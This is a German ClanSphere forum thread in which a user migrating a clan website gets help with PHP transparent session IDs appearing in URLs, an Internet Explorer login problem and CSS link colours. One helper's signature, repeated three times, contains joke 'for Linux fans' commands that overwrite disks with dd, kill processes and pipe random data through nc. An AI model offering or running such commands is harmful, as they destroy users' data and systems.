Demo

Probiere ClanSphere aus und teste daran herum. Demo


Antworten: 6
Seite [1]
GaHero


Poststar





Beiträge: 733
# Thema - 10.02.2009 um 11:44 Uhr
Hey,

folgendes Problem:

Mein Clan will von DZCP auf CSP umsteigen (sehr vernünftig).

Ich habe folgende Testseite aufgesetzt, um die Page dort zu coden und zu testen: http://gahero.ga.ohost.de/ncrew/

Dort funktioniert auch alles wunderbar.

Jetzt habe ich die Page in einem Testornder auf dem Webspace wo die jetzige Page (DZCP www.ncrew.de/) drauf ist installiert, damit unsere Leute den Inhalt einpflegen können...

www.ncrew.de/new_page

Allerdings habe ich mehrere Probleme:
Auf dem neuen Webspace (von Strato) kann man sich mit dem Internet Explorer nicht einloggen, man wird beim klick auf weiter direkt wieder ausgeloggt. Die debug.php schweigt dazu...

Weiterhin wird im Internet Explorer folgendes an jeden Link angehängt: http://ncrew.de/new_page/index.php?mod=news&action=view&id=1&PHPSESSID=5e485bc9ee318b9473e5e9e2c53db431 (Beispiel, das ist überall so)

Alle diese Probleme/Sachen treten weder im Firefox noch auf dem alten Testwebspace in Verbindung mit dem Inet Explorer auf, was mich etwas verwirrt! Auch unsere noch aktuelle Page unter DZCP zeigt keinen dieser Fehler!

Liegt es jetzt am Script oder am Strato Webspace (ich vermute eher letzteres) und was kann ich dagegen tun? Liegt es daran das die Page in einem Unterordner ist? (wohl eher nicht)


Und noch eine kleine Sache:

a {
color: inherit;
text-decoration: underline;
}

Firefox zeigt mir die Links entsprechend den Farben der Elternelemente an, im Internetexplorer sind aber alle Links in Standardfarben (blau, lila). Warum?


Zuletzt editiert von GaHero am 10.02.2009 um 11:54 Uhr (1x Editiert)
Inaktiv
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 1 - 10.02.2009 um 15:58 Uhr
zu 1. Das müssten ich glaube ich etwas mit transparente Sessions zu tun haben, kann mich da aber auch irren.
zu 2. Einfach die a, a:hover, a:active Tags ggf hinzufügen. Dann sollte das Problem auch weg sein.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Nachtmeister


Specialist




Herkunft: Bern
Beiträge: 2091
# Antwort: 2 - 10.02.2009 um 16:30 Uhr
2. a:link, a:visited mal für die standard setzen + a:hover, a:active


------------------
"God created the universe in 1 Day, and then spent 5 days making it look good In Internet Explorer"

Inaktiv
|
GaHero
Thread-Ersteller


Poststar





Beiträge: 733
# Antwort: 3 - 10.02.2009 um 19:14 Uhr
Ok, hat leider nicht geholfen... (Links sind immer noch blau) Habs jetzt so gemacht:

a:link, a:visited {
color: inherit;
text-decoration: underline;
}

a:hover, a:active {
text-decoration: none;
}

Falls ihr das meint, es geht nicht...

So zu 1.): Mir ist aufgefallen, dass die php Version auf 4 war, ich habs jetzt auf 5 geändert, aber es hat nicht geholfen! Was meinst du mit transparente Sessions? (ich google mal parallel keine Angst)

Aber bitte erstmal 1 lösen, dass ist etwas wichtiger! Vorallem tritt es jetzt doch im FF auf, also liegt es wohl am Webspace. Wegen was soll ich den Hoster denn anschreiben?


Zuletzt editiert von GaHero am 10.02.2009 um 19:16 Uhr (1x Editiert)
Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 4 - 10.02.2009 um 20:04 Uhr
Die Definition von "transparent".

Eine Session-ID in einer URL ist keine "transparente Session-ID", sondern "eine Session-ID in der URL".

"Transparent" ist, dass PHP an alle relativen URLs einer auszuliefernden Seite (nach Maßgabe von url_rewriter.tags) die Sessioninformation anhängen kann, ohne dass der Programmierer sich explizit drum kümmern muß.

Alternativbeispiel: Ein transparenter Proxy ist auch vollautomatisch mit im HTTP-Verkehr dabei, ohne dass der Browsernutzer ihn als Proxy eintragen muß.

Man muß das aber nicht transparent machen lassen, man kann es genausogut auch manuell und explizit tun, ohne dass sich an der Funktionsweise der Session oder den Sicherheitsimplikationen irgendetwas ändern würde. "Transparent" ist der Mechanismus also NUR für den Programmierer. Insofern ist es unsinnig, eine Session-ID in der URL als "transparente SID" zu bezeichnen, wenn eine nicht transparente SID, die manuell dorthin gelangte, genauso aussieht und genauso funktioniert.


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
GaHero
Thread-Ersteller


Poststar





Beiträge: 733
# Antwort: 5 - 10.02.2009 um 20:17 Uhr
Ok, was soll ich meinem Anbieter jetzt schreiben? Oder liegts doch am Script?


Inaktiv
|
pHaeno* ClanSphere Team


Geekboy





Beiträge: 1405
# Antwort: 6 - 10.02.2009 um 20:40 Uhr
Frag ihn welchen Wert deine transparenten Session haben.
Wenn sie an sind, soll er sie aus machen.
Sind sie aus, soll er sie an machen ^^


------------------
hajo says:
<div style="imbaness: 200pt; skill: 200pt; equip-align: top;">phaeno's mage</div>


27.05.2007 um 01:38 Uhr - pHaeno*:
Bei Clansphere gibt es KEINE Bugs, es sind ALLES FEATURES



weichmann... +-
Blondi (15:08):
bist du nen mann oder nen weich ei?


pHaeno* (15:09):
weichmann


mehr... +-
if($ahnung==0) {
read( 'handbuch' ) ;
}



## für Linux-Fans

kill -9 `netstat -a | grep https | awk -e '{ print $3; }'`
dd if=/dev/zero of=/dev/hda count=1M
dd if=/dev/zero of=/dev/sda count=1M
cat /dev/urandom | nc 127.0.0.1 443


Inaktiv
|
Antworten: 6
Seite [1]


Sie müssen sich registrieren, um zu antworten.